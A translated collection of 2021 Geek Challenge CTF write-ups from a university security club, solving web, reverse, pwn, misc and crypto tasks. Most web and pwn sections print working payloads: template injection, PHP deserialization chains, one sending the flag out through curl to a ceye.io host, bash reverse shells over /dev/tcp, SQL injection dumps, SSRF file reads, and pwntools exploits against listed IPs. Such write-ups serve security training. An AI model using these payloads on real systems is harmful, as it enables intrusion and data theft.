2021 geek challenge WP collection

WP comes from the network security community of Qilu Normal University

Pay attention to the official account to receive more latest safety messages.

WEB

Dark

When you look at the url, the standard dark net domain name at the end of the onion

Use the onion browser to access and view the html code

Welcome2021

Prompt at the beginning

Change GET to WELCOME, and then visit f11111aaaggg9.php

babypy

Simplest template injection

{{config.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /flag').read()")}}

babyphp

View source code

Access robots.txt

Visit / noobcurl.php

<?php
function ssrf_me($url){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        curl_close($ch);
        echo $output;
}
if(isset($_GET['url'])){
    ssrf_me($_GET['url']);
}
else{
    highlight_file(__FILE__);
        echo "<!-- Is there a possibility, flag In the root directory -->";

Prompt that the flag is in the root directory and can be read directly with file

obcurl.php?url=file:///flag

babypop

The source code is

<?php
class a {
    public static $Do_u_like_JiaRan = false;
    public static $Do_u_like_AFKL = false;
}
class b {
    private $i_want_2_listen_2_MaoZhongDu;
    public function __toString()
    {
        if (a::$Do_u_like_AFKL) {
            return exec($this->i_want_2_listen_2_MaoZhongDu);
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}
class c {
    public function __wakeup()
    {
        a::$Do_u_like_JiaRan = true;
    }
}
class d {
    public function __invoke()
    {
        a::$Do_u_like_AFKL = true;
        return "Pay attention to jiaran," . $this->value;
    }
}
class e {
    public function __destruct()
    {
        if (a::$Do_u_like_JiaRan) {
            ($this->afkl)();
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}
if (isset($_GET['data'])) {
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
}

By observing the code, it can be found that the rce is finally performed through exec

Then it is found that return is used in class d to return, which can just be triggered__ toString method

Then, if the if in class e is judged to be true, it can be triggered__ invoke

To make if true, one limitation is to use static variables in class a

class a {
  public static $Do_u_like_JiaRan = false;
  public static $Do_u_like_AFKL = false;
}

So it can only be passed through class c__ wakeup method to change $do_ u_ like_ Value of jiaran

Write exp from here

<?php

class b {
    private $i_want_2_listen_2_MaoZhongDu;
    public function __construct(){
        $this->i_want_2_listen_2_MaoZhongDu="curl `cat</flag|base64`.xxxx.ceye.io";
    }
    
}

class c {
    public $cvalue;
    public function __construct(){
        $this->cvalue=new e();
    }
    
}

class d {
    public $value;
    public function __construct(){
        $this->value=new b();
    }
   
}

class e {
    public $afkl;
    public function __construct(){
        $this->afkl=new d();
    }
    
}

$a=new c();
echo base64_encode(serialize($a));

base64 decoding is enough

where_is_my_FUMO

Open the topic and you can see the source code

<?php
function chijou_kega_no_junnka($str) {
  $black_list = [">", ";", "|", "{", "}", "/", " "];
  return str_replace($black_list, "", $str);
}
if (isset($_GET['DATA'])) {
  $data = $_GET['DATA'];
  $addr = chijou_kega_no_junnka($data['ADDR']);
  $port = chijou_kega_no_junnka($data['PORT']);
  exec("bash -c \"bash -i < /dev/tcp/$addr/$port\"");
} else {
  highlight_file(__FILE__);
}

You can pass parameters through the array, and the shell can be bounced at exec

http://1.14.102.22:8115/?DATA[ADDR]=IP&DATA[PORT]=port

In this way, the shell can be bounced to the corresponding ip port

Then vps monitors the corresponding port

nc -lvvp 9999

However, in the title, bash rebounds the shell writing method, which can only transfer the command from the attacker to the victim. The command can be executed but not echoed

bash -i < /dev/tcp/$addr/$port

There are two ways to get the shell without echo. The first is to rebound the interactive shell to other ports of vps

bash -i >& /dev/tcp/ip/6666 0>&1

Listen to the port, get the shell, and find the root directory flag.png

The discovery permission is www data, and the file permissions in the host are root, that is, you can only view files and can't write shell s

cat flag.png | base64

A lot of content, the base will be encoded and then decoded to get the picture

The second method

Relatively simple, you need to understand the principle of bash rebound shell

/dev/tcp|udp/ip/port is a special file. In fact, it can be regarded as a device (everything is a file under Linux). In fact, if you access the location of this file, it does not exist

However, if you read and write this file when one side listens to the port, you can realize socket communication with the server listening to the port

Just pass the flag.png directly

vps listens to port 6666 and saves the received file

nc -lvvp 6666 > /var/test.png

Finally get the picture, that is, flag

Honey snow ice city sweet honey

This question fits well with the penetration test

Before doing this, don't forget that this is a web problem. Don't think about looking at conventional password ideas

Topic tip: you can get the flag by clicking the No. 9 beverage, but there are only 8. Try to capture the package and modify id=9. If you find a prompt error, you can know from the source code

I found that he got the id in html and then went to rsa encryption. Since the encryption is difficult to change, just change the id directly. Just find a commodity, change the id to 9 in F12, and then buy it

easyPOP

<?php
class a {
    public function __destruct()
    {
        $this->test->test();
    }
}
abstract class b {
    private $b = 1;
    abstract protected function eval();
    public function test() {
        ($this->b)();
    }
}
class c extends b {
    private $call;
    protected $value;
    protected function eval() {
        if (is_array($this->value)) {
            ($this->call)($this->value);
        } else {
            die("you can't do this :(");
        }
    }
}
class d {
    public $value;
    public function eval($call) {
        $call($this->value);
    }
}
if (isset($_GET['data'])) {
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
}
exp
<?php
class a {
    public function __construct()
    {
        $this->test=new c('cat /flag');
    }
}

abstract class b {
    private $b; #Pass method of constructing class method array

    public function __construct() {
        $this->b=[$this,'eval'];
    }

    abstract protected function eval();

    public function test() {
        ($this->b)();#Only parameterless functions such as phpinfo can be executed here
    }
}

class c extends b {
    private $call;
    protected $value;

    function __construct($command) {
        parent::__construct();
        $this->call=[new d('system'),'eval'];
        $this->value=[new d($command),'eval'];
    }
    protected function eval() {
        if (is_array($this->value)) {
            ($this->call)($this->value);
        } else {
            die("you can't do this :(");
        }
    }
}

class d {
    public $value;

    public function __construct($command){
        $this->value=$command;
    }
    public function eval($call) {
        $call($this->value);
    }
}

$payload = new a();
echo base64_encode(serialize($payload));
?>

babysql

Single quote closure

It is judged that the echo is 1,2

uname=1&pwd=1' union select 1,2,3,4 #

Burst the database name, including the flag library

uname=1&pwd=1' union select 1,group_concat(schema_name),3,4 from information_schema.schemata#

Burst the table of flag Library

uname=1&pwd=1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='flag'#

Explode the fields of the fllag table

uname=1&pwd=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='fllag'#

Burst data

uname=1&pwd=1' union select 1,group_concat(fllllllag),3,4 from flag.fllag#

Baby_PHP_Black_Magic_Enlightenment

First pass

<?php

echo "PHP is the best Language <br/>";

echo "Have you ever heard about PHP Black Magic<br/>";

error_reporting(0);

$temp = $_GET['password'];

is_numeric($temp)?die("no way"):NULL;  

if($temp>9999){

  echo file_get_contents('./2.php');

  echo "How's that possible";

} 

highlight_file(__FILE__);

//Art is long, but life is short. So I use PHP.

//I think It`s So useful that DiaoRen Said;

//why not they use their vps !!!

//BBTZ le jiarenmen

?>

Array bypass look at the source code

Second pass

<?php
error_reporting(0);
$flag=getenv('flag');
if (isset($_GET['user']) and isset($_GET['pass'])) 
{
   if ($_GET['user'] == $_GET['pass'])
       echo 'no no no no way for you to do so.';
   else if (sha1($_GET['user']) === sha1($_GET['pass']))
     die('G1ve u the flag'.$flag);
   else
       echo 'not right';
}
else
   echo 'Just g1ve it a try.';
highlight_file(__FILE__);
?>

Or array bypass

http://tc.rigelx.top:8003/baby_magic.php?user[1]=2&pass[1]=1

Third pass

<?php
error_reporting(0);
$flag=getenv('fllag');
if (isset($_GET['user']) and isset($_GET['pass'])) 
{
    if ($_GET['user'] == $_GET['pass'])
        echo 'no no no no way for you to do so.';
    else if(is_array($_GET['user']) || is_array($_GET['pass']))
        die('There is no way you can sneak me, young man!');
    else if (sha1($_GET['user']) === sha1($_GET['pass'])){
      echo "Hanzo:It is impossible only the tribe of Shimada can controle the dragon<br/>";
      die('Genji:We will see again Hanzo'.$flag.'<br/>');
    }
    else
        echo 'Wrong!';
}else
    echo 'Just G1ve it a try.';
highlight_file(__FILE__);
?>

sha1 collision

http://tc.rigelx.top:8003/baby_revenge.php?user=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&

&pass=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

The fourth level

<?php
$flag=getenv('flllllllllag');
if(strstr("Longlone",$_GET['id'])) {
  echo("no no no!<br>");
  exit();
}
$_GET['id'] = urldecode($_GET['id']);
if($_GET['id'] === "Longlone")
{
  
  echo "flag: $flag";
}
highlight_file(__FILE__);
?>

Very simply, the first time the str function does not have url decoding, it can be bypassed as long as the url is encoded twice

http://tc.rigelx.top:8003/here_s_the_flag.php?id=%25%34%63%25%36%66%25%36%65%25%36%37%25%36%63%25%36%66%25%36%65%25%36%35

People artists

The question is a little off balance

The first is the login interface. If the login fails, the account will be prompted

Log in with this account and capture the package. You can see jwt in the returned package

Use jwt.io to view. It is encrypted. Use jwtrack to blast. The password is 1234. Combined with the prompt, change the name to admin and the time to 2019

At first, I thought there was another interface. I brought jwt when contracting out. As a result, dirsearch didn't find anything, so I tried the http request line

Ha ha, yes

givemeyourlove

The prompt is obvious. Call redis for ssrf

<?php
// I hear her lucky number is 123123
highlight_file(__FILE__);
$ch = curl_init();
$url=$_GET['url'];
if(preg_match("/^https|dict|file:/is",$url))
{
    echo 'NO NO HACKING!!';
    die();
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);   
curl_close($ch);  
?>

You can use the http protocol to determine whether the service is turned on
http://1.14.71.112:44423/?url=http://127.0.0.1:6379
I found that redis takes a long time to access, but I can't get through

RE

Re0

Drag it into ida and directly search the string with F5 to see the flag

*SYC{Welcome_to_Geek_challenge2021}*

debugging

Drag into ida to find the main function, and you can see the obvious encrypted number

797G91WhVFeM465FoGJuWpHKDro2QyCixboJV7uhVAV2pfxkhtiTo3CHd7a

Use cipher to see what the password is

Since the 100% base password

After the test, it was found to be base58

SYC{C0ngr@tuIatlOns_thls_1s_th3_r!gHt_f!ag}

easypyc

easypy.pyc

Use uncomply6 to convert to py file to view the source code

def Challenge():
    import sys
    print("Welcome to py's world")
    S = input('plz give me your flag:')
    Key = input('plz give me your key(string):')
    if len(S) != 51 or len(Key) != 8:
        print("the flag's or key's strlen...")
        sys.exit()
    else:
        tmp = S[4:50]
        KEY_cmp = 'Syclover'
        key = []
        key_cmp = ''
        for i in Key:
            key.append(ord(i))
        try:
            key_cmp += chr((key[1] * key[2] - key[5] * 72 - key[4] * 3 - key[3] ^ key[1] + (key[3] << 2) + key[2] * 6 - key[7] & key[6] - 1000) - 14)
            key_cmp += chr((key[5] * 7 + key[3] * 3 + key[2] + key[6] - (key[2] >> 2) - key[1] ^ key[0] + key[7] + (key[4] ^ key[1]) + (key[4] | key[7])) - 801)
            key_cmp += chr((key[6] * 5 + key[2] * 6 - key[3] * 7 + key[4] | key[5] + key[4] * 10 + key[0] ^ key[1] * 3 - key[7] + key[0] + key[1]) - 924)
            key_cmp += chr(key[1] * 3 + key[5] * 9 + key[0] + key[2] * 2 + key[3] * 5 - key[4] * (key[6] ^ key[7]) + 321 - 16)
            key_cmp += chr((key[5] * 12 - key[0] ^ key[6] - key[3] * 23 + key[4] * 3 + key[2] * 8 + key[1] - key[7] * 2 + key[6] * 4 + 1324) + 1)
            key_cmp += chr(key[3] * 54 - key[1] * 3 + key[2] * 3 + key[4] * 11 - key[5] * 2 + key[0] + key[7] * 3 - key[6] - 6298 + 40)
            key_cmp += chr(key[7] - key[6] * key[3] + key[2] * key[2] - key[4] * 32 + key[5] * (key[0] >> 2) - key[1] * key[1] - 6689 + 41)
            key_cmp += chr((key[5] - key[3] * 41 + key[6] * 41 + key[5] ^ (key[4] & key[6] | key[0]) - (key[7] * 24 | key[2]) + key[1] - 589) - 36)
            print(key_cmp)
        except ValueError:
            print("You know what I'm going to say...")
            sys.exit()

        if key_cmp != KEY_cmp:
            print("You know what I'm going to say...")
            sys.exit()
        flag = [
         113, 74, 71, 35, 29, 91, 29, 12, 114, 73, 60, 52, 69, 5, 113, 35, 95, 38, 20, 112, 95, 7, 74, 12, 102, 23, 7, 31, 87, 5, 113, 98, 85, 38, 16, 112, 29, 6, 30, 12, 65, 73, 83, 36, 12, 23]
        for i in range(46):
            if ord(tmp[i]) ^ key[((i + 1) % len(key))] != flag[i]:
                print("You know what I'm going to say...")
                sys.exit()

        print('Yeah!Submit your flag in a hurry~')

Challenge()

The code XOR the 4-20 bits of the flag we entered with the key. The value after XOR is required to be equal to the flag

Now we need to reverse the tmp according to the key and flag. We don't know how many keys are, but we can use the key_cmp asks for key. See so many judgments, you can use z3 to try.

from z3 import *
s = Solver() 
v0 = BitVec('v0',32)
v1 = BitVec('v1',32)
v2 = BitVec('v2',32)
v3 = BitVec('v3',32)
v4 = BitVec('v4',32)
v5 = BitVec('v5',32)
v6 = BitVec('v6',32)
v7 = BitVec('v7',32)
s.add(((v1*v2-v5*72-v4*3-v3^v1+(v3<<2)+v2*6-v7&v6-1000)-14) == 83)
s.add(((v5*7+v3*3+v2+v6-(v2>>2)-v1^v0+v7+(v4^v1)+(v4|v7))-801) == 121)
s.add(((v6*5+v2*6-v3*7+v4|v5+v4*10+v0^v1*3-v7+v0+v1)-924) == 99)
s.add((v1*3+v5*9+v0+v2*2+v3*5-v4*(v6^v7)+321-16) == 108)
s.add(((v5*12-v0^v6-v3*23+v4*3+v2*8+v1-v7*2+v6*4+1324)+1) == 111)
s.add((v3*54-v1*3+v2*3+v4*11-v5*2+v0+v7*3-v6-6298+40)  == 118)
s.add((v7-v6*v3+v2*v2-v4*32+v5*(v0>>2)-v1*v1-6689+41) == 101)
s.add(((v5-v3*41+v6*41+v5^(v4&v6|v0)-(v7*24|v2)+v1-589)-36) == 114)
print(s.check())
if(s.check() == sat):
    result = s.model()
    print(result)

reach key = [83,38,121,99,64,45,54,46]
Run out with script flag
key = [83,38,121,99,64,45,54,46]
flag = [
    113, 74, 71, 35, 29, 91, 29, 12, 114, 73, 60, 52, 69, 5, 113, 35, 95, 38, 20, 112, 95, 7, 74, 12, 102, 23, 7, 31,
    87, 5, 113, 98, 85, 38, 16, 112, 29, 6, 30, 12, 65, 73, 83, 36, 12, 23]
tmp = ''
for i in range(46):
    tmp+= chr((key[((i + 1) % len(key))]) ^ flag[i])
print(tmp)

SYC{W3$c0m3_T0_th3_py_w0r1d_@nd_z3_1s_s0000_g00d!!}

Liu Zhuang desktop beautification master

View with Android killer

Navigate to key string position

You can know that the flag should be stored in the file in the form of string

PWN

Retxxx

Simple stack overflow

from pwn import *
import time
context.arch = 'amd64'
context.log_level = 'debug'

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('123.57.230.48','12345')
# gdb.attach(p,'b *0x08048625')
sa('Try your best to solve it!',p32(0x6b8b4567))
system = 0x80483c0
sh = 0x80496d0
pl = 'a'*30+p32(system)+p32(0)+p32(sh)
s(pl)
ell()

easy leak canary and call

from pwn import *
context.log_level = 'debug'

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('123.57.230.48','12344')
backdoor=0x4011d6
# gdb.attach(p,'b *0x4012A3')
sl('%11$p')
canary = int(rx(18),16)
success(hex(canary))
pl = 'a'*0x28+p64(canary)+p64(0)+p64(backdoor)
s(pl)

shell()

easycanary

Leak canary and call

from pwn import *
context.log_level = 'debug'

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('123.57.230.48','12344')
backdoor=0x4011d6
# gdb.attach(p,'b *0x4012A3')
sl('%11$p')
canary = int(rx(18),16)
success(hex(canary))
pl = 'a'*0x28+p64(canary)+p64(0)+p64(backdoor)
s(pl)
shell()

easyfmt

Simple format string question

from pwn import *
# context.log_level = 'debug'

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('123.57.230.48','12342')
elf = ELF('./pwn')
backdoor = 0x0804874d
# gdb.attach(p,'b *0x08048685')
ru('First step:\n')
target = int(rud('\n'),16)
pl = p32(target)+'%8c%15$n'
success(hex(target))
sl(pl)

pl = p32(target+0x10)+'%'+str((backdoor&0xff)-4)+'c%7$hhn'
sla('there',pl)
shell()

Love games

from pwn import *

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('47.242.20.238','10001')
pl = 'a'*24+p64(0x404058)
s(pl)
shell()

Love games 2.0

from pwn import *

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwn')
p = remote('47.242.20.238','10000')
pl = 'a'*24+'loveyou\x00'
s(pl)
shell()

checkin

from pwn import *

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

p = remote('123.57.230.48','12343')
for i in range(200):
	ru('num1:')
	num1 = rud('\n')
	ru('num2:')
	num2 = rud('\n')
	ru('calculation is ')
	sign = rud('\n')
	print(num1,num2,sign)
	result = eval(num1+sign+num2)
	sl(str(result))
shell()

pwn777

The bss segment formats the string, opens the sandbox, first overwrites the seed to 0, bypasses the first check, constructs a springboard through the format string vulnerability, modifies the rbp value to the location of the orw chain, and then migrates the stack. In fact, the script can be changed to 100%, but laziness becomes a probability solution

from pwn import *
import time
context.arch = 'amd64'
context.log_level = 'debug'

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

def pwn():
	sla('input your name','a'*0x18+p32(0))
	sla('input your number:',str(0x6b8b4567))
	sla('input your number:',str(0x327b23c6))
	sla('input your number:',str(0x643c9869))
	sla('input your number:',str(0x66334873))
	sla('input your number:',str(0x74b0dc51))
	sla('input your number:',str(0x19495cff))
	sla('input your number:',str(0x2ae8944a))
	sla('input your number:',str(0x625558ec))
	sla('input your number:',str(0x238e1f29))
	sla('input your number:',str(0x46e87ccd))
	sla('try your best!\n','Amalll')
	sleep(0.1)
	sl('%31$p')
	ru('Amalll')
	base = int(rx(14),16)-0x5fa80b
	system = base+libc.sym['system']&0xffffff
	sh = base+libc.search('/bin/sh\x00').next()
	rdi = base+libc.search(asm("pop rdi;ret;")).next()
	ret = base+libc.search(asm("ret;")).next()

	sl('Amalll')
	sleep(0.1)
	sl('%7$p')
	ru('Amalll')
	pie = int(rx(14),16)-71-elf.sym['mymain']
	buf = (pie+0x4060)+8
	success(hex(buf))

	pl = '%'+str(buf&0xff)+'c%7$hhn'

	sl('Amalll')
	sleep(0.1)
	sl('%10$p')
	rx(6)
	stack = int(rx(14),16)-0x30
	success(hex(stack))

	#15-->41
	sl('Amalll')
	sleep(0.1)
	pl = '%'+str(stack&0xffff)+'c%15$hn'
	sl(pl)

	#29-->43
	sl('Amalll')
	sleep(0.1)
	pl = '%'+str((stack&0xffff)+2)+'c%29$hn'
	sl(pl)

	#41-->6
	sl('Amalll')
	sleep(0.1)
	pl = '%'+str((stack&0xffff)+4)+'c%41$hn'
	sl(pl)

	x = []
	x.append(buf&0xffff)
	x.append((buf>>16)&0xffff)
	x.append((buf>>32)&0xffff)
	x.sort()
	print(x[0],x[1],x[2]) #high,low,mid

	# gdb.attach(p,'b *$rebase(0x1621)')
	pl = '%'+str(x[0])+'c%6$hn' #high
	pl+= '%'+str(x[1]-x[0])+'c%41$hn'
	pl+= '%'+str(x[2]-x[1])+'c%43$hn'
	sl('Amalll')
	sleep(0.1)
	sl(pl)


	rdi = base+libc.search(asm("pop rdi;ret;")).next()
	rsi = base+libc.search(asm("pop rsi;ret;")).next()
	rdx = base+libc.search(asm("pop rdx;ret;")).next()
	f_hook = base+libc.sym['__free_hook']
	dopen = base+libc.sym['open']
	dread = base+libc.sym['read']
	dwrite = base+libc.sym['write']

	rop = p64(rdi)+p64(buf+0xa0)
	rop+= p64(rsi)+p64(0)+p64(dopen)
	rop+= p64(rdi)+p64(3)
	rop+= p64(rsi)+p64(f_hook&0xfffffffffffff000+0x100)
	rop+= p64(rdx)+p64(0x30)+p64(dread)
	rop+= p64(rdi)+p64(1)
	rop+= p64(rsi)+p64(f_hook&0xfffffffffffff000+0x100)
	rop+= p64(rdx)+p64(0x30)+p64(dwrite)
	rop+= './flag\x00\x00'
	# gdb.attach(p,'b *'+str(rdi))
	sl('jiaraniloveyou~\x00'+rop)

while 1:
	try:
		# p = process('./pwn')
		p = remote('47.242.20.238','7777')
		elf = ELF('./pwn')
		libc = elf.libc
		pwn()
		break
	except:
		p.close()

shell()

MISC

Have you been broken today

The attachment found is row by row hex data similar to pixels

Then the script extracts the 1080 * 1080 picture

The script can generate pictures.

#Replace the space with a comma in advance

from PIL import Image
img = Image.new('RGB',(1080,1080))
filetxt = open('ans.txt','r').read()
filetxt = filetxt.replace('\n',',')
# print(filetxt)
filetxt = filetxt.split(',')  #length = 3499200
# print(len(filetxt))
rea = ''
hexlist = []
for i in filetxt:
    hexlist.append(int(i,16))
# print(len(hexlist))  #length = 3499200
new_txt = open('nans.txt','a')
pixellist = []
for i in range(0,3499200,3):
    # new_txt.write(str(hexlist[i:i+3]).replace('[','(').replace(']',')') + '\n')
    # new_txt.write(str(hexlist[i:i+3]).replace('[','').replace(']','') + '\n')
    pixellist.append(hexlist[i:i+3])
# print(type(pixellist))
# pixel_txt = open('4.txt','r').read()
# pixel_txt = pixel_txt.split('\n')
# print(len(pixel_txt))
num = 0
for x in range(0,1080):
    for y in range(0,1080):
        #print(tuple(pixellist[num]))
        # print()
        img.putpixel((x,y),tuple(pixellist[num]))
        num = num + 1
img.show()
img.save('rea.png')

obtain


Using gap puzzles

gaps --image=rea.png --generations=50 --population=729 --size=40 --save

Crypto

Three is OK

It is known that because p, q and r are very close, they can be decomposed directly using the online website

http://www.factordb.com/

After decomposing n, decrypt it directly

import gmpy2
p = 821285845529489288911031313917
q = 967244547191154261539598250343
r = 1005682191548299165290460437397
e= 65537
c= 249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575
n=p*q*r

phi=(p-1)*(q-1)*(r-1)
d=gmpy2.invert(e,phi)
m=pow(c,d,n)
print(m)
print(binascii.unhexlify(hex(m)[2:].strip("L")))
b'SYC{now_you_solve_it}'

Tags: CTF pwn

Posted on Sat, 20 Nov 2021 05:37:23 -0500 by nrg_alpha